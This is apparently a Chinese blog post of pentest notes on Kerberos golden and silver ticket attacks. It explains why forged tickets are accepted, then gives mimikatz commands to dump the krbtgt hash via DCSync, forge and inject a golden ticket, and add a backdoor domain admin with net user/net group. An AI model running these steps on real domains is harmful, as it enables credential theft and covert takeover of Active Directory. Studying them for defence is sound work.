首页 > 其他分享 >金票银票

金票银票

时间:2024-03-24 21:12:30浏览次数:21  
标签:银票 session 票据 key 攻击者 金票 伪造 客户端

image.png

  • 黄金票据就是伪造的身份票据 是伪造的as颁发的TGT 身份票据
  • 白银票据是伪造的服务票据 是伪造的tgs颁发的ST 服务票据

黄金票据

  • 与KDC(密钥分发中心)交互 不与as交互
  • 黄金票据伪造的就是TGT1 和TGT2
  • 条件
    1、域名称
    2、域的SID值
    3、域的KRBTGT账号的HASH
    4、伪造任意用户名
  • 为什么能骗过域控的tgs服务
    • 因为伪造的是TGT1和TGT2
    • TGT1中包含的session key(as)是伪造的 客户端的ntlm也是伪造的
    • TGT2中包含的session key(as)也是伪造的 客户端信息是攻击者信息 域krbtgt的ntlm HASH已经知道了 加密的时候是用的真实的ntlm
    • 生成的认证因子1其中的客户端信息是攻击者信息加密的方式也是session key(as)是伪造的
    • 在第4步tgs解密TGT2的时候 得到的是伪造的session key(as) 用家的session key(as)解密认证因子 得到的客户端信息是攻击者的信息 与 TGT2中解密出的信息一致 接下来的步骤则都为真实了

白银票据

  • 不与KDC交互 只与服务器交互
  • 白银票据伪造的是tgs发送的ST 服务票据
  • 条件
    1.域名
    2.域sid
    3.目标服务器名
    4.可利用的服务
    5.服务账号的NTML HASH
    6.需要伪造的用户名
  • 为什么能骗过应用服务器
    • 直接伪造的是TGT4和认证因子2
    • TGT4中的session key(tgs)是伪造的 其中的客户端信息是攻击者信息 加密的服务的ntlm是真实的早知道的
    • 认证因子2中的客户端信息是攻击者的 加密用的session key(tgs)是伪造的
    • 服务器得到TGT4和认证因子2后解密TGT4 用的是自己的ntlm 与攻击者早得到的是一致的 所以解密成功 得到的sessions key(as)是伪造的
    • 用伪造的sessions key(as)解密认证因子2一定能成功 得到的客户端信息与TGT4中的客户端信息相同 就直接提供服务了

黄金票据利用方式

1、在普通域用户中使用mimikatz生成黄金票据.kirbi文件并保存
要进入猕猴桃所在的目录 管理员打开

privilege::debug  
lsadump::lsa /patch

image-20230404110133160

mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希
kerberos::golden /user:administrator /domain:xiusafe.com /sid:S-1-5-21-3818247987-2711466351-3365387365 /krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi


/user:需要伪造的域管理员用户
/domain:域名称
/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!)
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称

image-20230404112022330

2、清除票据

kerberos::purge   \\清除票据  
kerberos::tgt     \\查看票据

3、导入票据

kerberos::ptt ticket.kirbi

4、创建域管

net user a !@#qwe123 /add /domain  创建域用户
net group "domain admins" a /add /domain  加入域控组

黄金票据与白银票据的区别

获取的权限不同

金票:伪造的TGT,可以获取任意Kerberos的访问权限

银票:伪造的ST,只能访问指定的服务,如CIFS

认证流程不同

金票:同KDC交互,但不同AS交互

银票:不同KDC交互,直接访问Server

加密方式不同

金票:由krbtgt NTLM Hash 加密

银票:由服务账号 NTLM Hash 加密

标签:银票,session,票据,key,攻击者,金票,伪造,客户端
From: https://www.cnblogs.com/XingZin/p/18093059

相关文章

  • 黄金票据权限维持
    黄金票据权限维持目录黄金票据权限维持一、Krbtgt账户介绍二、黄金票据原理三、实验前提四、实验步骤一、Krbtgt账户介绍krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。二、黄金票据原理TGT=Krbtgt的NTL......
  • 白银票据权限维持
    白银票据权限维持目录白银票据权限维持一、服务账号介绍二、白银票据原理三、实验前提四、实验步骤一、服务账号介绍服务账号就是计算机名字+$用来管理服务的账号二、白银票据原理如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。在Kerberos认证的第5步,Client带着ST和A......
  • 黄金票据与白银票据学习
    黄金票据与白银票据学习前言票据传递攻击(PtT)是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PtT最常见的用途可能是使用黄金票据和白银票据,通过PtT访问主机相当简单。对于kerberos协议的学习可以参考:https://www.bilibili.com/video/av866898346https://www.cnblogs.......
  • 基于AD Event日志识别黄金票据攻击
    01、简介黄金票据(GoldenTicket)是基于Kerberos认证的一种攻击方式,常用来做域控权限维持。当攻击者获取到域内krbtgt帐户的SID和HASH,就可以随意伪造域内管理员用户,再加......
  • 内网安全之:黄金&白银票据传递域控制器权限维持
    内网安全之:黄金&白银票据传递域控制器权限维持目录内网安全之:黄金&白银票据传递域控制器权限维持1GoldenTicket1.1导出krbtgt的NTLMHash1.2获取基本信息1.3Kerbe......